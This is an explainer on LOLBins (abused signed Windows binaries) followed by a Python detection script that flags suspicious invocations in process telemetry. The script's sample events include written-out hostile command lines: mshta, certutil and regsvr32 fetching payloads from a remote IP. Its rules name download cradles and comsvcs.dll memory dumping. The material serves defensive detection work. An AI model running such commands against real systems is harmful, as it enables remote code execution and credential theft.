LOLBin

LOLBin is short for Living Off the Land Binary. It refers to legitimate, often preinstalled or signed system executables that can be repurposed by attackers to conduct malicious activity without introducing new, suspicious binaries. By using trusted tools already present on a host, adversaries can execute commands, run scripts, download payloads, or move laterally while blending in with normal system behavior. The concept highlights how security risks can arise not only from malware but also from abuse of ordinary software.

Common LOLBins include regsvr32.exe, mshta.exe, wmic.exe, certutil.exe, bitsadmin.exe, powershell.exe, wscript.exe, cscript.exe, rundll32.exe, and msbuild.exe. These tools enable a range of techniques such as proxy execution of code and scripts (often fetched from a remote server), fileless malware deployment, data exfiltration, and credential access. Because they are signed and often trusted, LOLBins may bypass some basic detections that focus on untrusted or suspicious binaries, making their activity a particular concern for defenders. The binary name alone is rarely a useful signal, since the same executables are used legitimately every day; what distinguishes abuse is the combination of command-line arguments, parent process, invoking user, and network destination.

Detection and defense focus on identifying abnormal or unauthorized use of these binaries. This can involve enabling application whitelisting or allowlisting to restrict execution to approved binaries, employing endpoint detection and response (EDR) capabilities to monitor for suspicious invocation patterns, and applying strict privilege controls to limit which users can run powerful tools. Additional mitigations include reducing exposure to network-enabled binary usage, auditing and logging LOLBin activity (process creation with full command lines and parent process, for example Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing enabled), segmenting networks, and keeping systems up to date with security patches. Understanding LOLBins helps security teams distinguish legitimate administrative operations from opportunistic abuse during an intrusion.
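The following is an added example, not code from the original page or from any product it mentions, showing how the invocation-pattern monitoring described above can be expressed as detection logic. It scans process-creation records in the shape of Sysmon Event ID 1 / Security 4688 data (image path, command line, parent image, user), applies argument patterns taken from publicly documented LOLBAS abuse of the binaries listed in this article, and adds a parent-process check so that a LOLBin spawned by an Office application is flagged even when its arguments look ordinary. The events, hostnames, user names and paths are constructed for the example; the rule set is deliberately small and would be tuned against real telemetry before use.

```python
"""Flag suspicious LOLBin invocations in process-creation telemetry (added example)."""
import re

# Rules keyed by LOLBin basename: (regex over the full command line, description).
# Patterns follow publicly documented LOLBAS abuse. Matching is case-insensitive
# because attackers vary casing to defeat naive string comparison.
LOLBIN_RULES = {
    "certutil.exe": [
        (r"-urlcache\b.*\s-f\b", "certutil used as a downloader (-urlcache -f)"),
        (r"-decode\b", "certutil decoding a base64 payload"),
    ],
    "mshta.exe": [
        (r"\b(https?|javascript|vbscript):", "mshta executing remote or inline script"),
    ],
    "regsvr32.exe": [
        (r"/i:\S*https?:|scrobj\.dll", "regsvr32 loading a scriptlet (squiblydoo)"),
    ],
    "rundll32.exe": [
        (r"javascript:", "rundll32 running inline JavaScript"),
        (r"comsvcs\.dll.*MiniDump", "rundll32 dumping process memory via comsvcs.dll"),
    ],
    "bitsadmin.exe": [
        (r"/transfer\b|/addfile\b", "bitsadmin used as a downloader"),
    ],
    "powershell.exe": [
        (r"\s-(e|ec|enc|encodedcommand)\s", "powershell encoded command"),
        (r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\biex\b|Invoke-Expression",
         "powershell download cradle"),
        (r"-w(indowstyle)?\s+hidden", "powershell hidden window"),
    ],
    "wmic.exe": [
        (r"process\s+call\s+create", "wmic spawning a process"),
        (r"/node:", "wmic targeting a remote host"),
    ],
    "msbuild.exe": [
        (r"\.(xml|csproj|proj)\b", "msbuild compiling an inline task project"),
    ],
    # Script hosts are noisy (login scripts); only flag scripts in user-writable locations.
    "wscript.exe": [
        (r"\\(temp|downloads|appdata)\\.*\.(js|jse|vbs|vbe|wsf)\b", "wscript running a script from a user-writable path"),
    ],
    "cscript.exe": [
        (r"\\(temp|downloads|appdata)\\.*\.(js|jse|vbs|vbe|wsf)\b", "cscript running a script from a user-writable path"),
    ],
}

# Parents that should not normally spawn a LOLBin at all (document-delivered payloads).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Constructed sample telemetry, not captured data. Hosts/users/paths are fictitious.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://203.0.113.7/update.hta",
     "parent": r"C:\Windows\System32\cmd.exe", "user": r"CORP\alice"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.7/a.txt C:\Users\alice\AppData\Local\Temp\a.txt",
     "parent": r"C:\Windows\System32\cmd.exe", "user": r"CORP\alice"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:http://203.0.113.7/x.sct scrobj.dll",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "user": r"CORP\alice"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -Command Get-Service -Name Spooler",
     "parent": r"C:\Windows\System32\svchost.exe", "user": r"CORP\svc-monitor"},   # benign
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\Users\bob\Downloads\setup.msi SHA256",
     "parent": r"C:\Windows\System32\cmd.exe", "user": r"CORP\bob"},               # benign
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\bob\AppData\Local\Temp\d.tmp,DllMain",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "user": r"CORP\bob"},
]


def basename(path):
    """Lower-cased final path component, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def scan(events):
    """Return one finding per event whose LOLBin invocation matches a rule or a suspicious parent."""
    findings = []
    for i, ev in enumerate(events):
        image = basename(ev["image"])
        if image not in LOLBIN_RULES:
            continue  # not one of the binaries we watch
        reasons = [desc for pattern, desc in LOLBIN_RULES[image]
                   if re.search(pattern, ev["cmdline"], re.IGNORECASE)]
        parent = basename(ev.get("parent", ""))
        if parent in SUSPICIOUS_PARENTS:
            reasons.append(f"LOLBin launched by {parent}")
        if reasons:
            findings.append({"index": i, "image": image, "user": ev["user"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f['index']}] {f['image']} as {f['user']}: {'; '.join(f['reasons'])}")
```

Of the six constructed events, the two benign ones (a monitoring account querying a service, a user hashing an installer) produce no finding, while the mshta, certutil and regsvr32 downloads are caught on their arguments and the rundll32 call is caught only because Word is its parent. That last case is the point of combining checks: the argument list alone looks like routine DLL loading.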